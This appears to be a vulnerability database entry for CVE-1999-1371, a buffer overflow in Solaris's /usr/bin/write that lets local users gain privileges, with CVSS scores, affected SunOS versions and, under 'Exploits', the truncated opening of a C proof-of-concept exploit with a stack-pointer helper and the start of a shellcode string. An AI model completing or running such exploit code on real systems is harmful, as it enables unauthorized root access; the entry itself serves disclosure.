7.2
CVSSv2

CVE-1999-1371

Published: 08/03/1999 Updated: 30/10/2018
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in /usr/bin/write in Solaris 2.6 and 7 allows local users to gain privileges via a long string in the terminal name argument.

Vulnerable Product Search on Vulmon Subscribe to Product

sun sunos -

sun sunos 5.7

sun sunos 5.5.1

Exploits

#include <stdioh> #include <unistdh> /* /usr/bin/write overflow proof of conecpt Tested on Solaris 7 x86 Pablo Sor, Buenos Aires, Argentina 01/2000 psor@afipgovar usage: write-exp [shell_offset] [ret_addr_offset] default offset should work */ long get_esp() { __asm__("movl %esp,%eax"); } char shell[] = "\xeb\ ...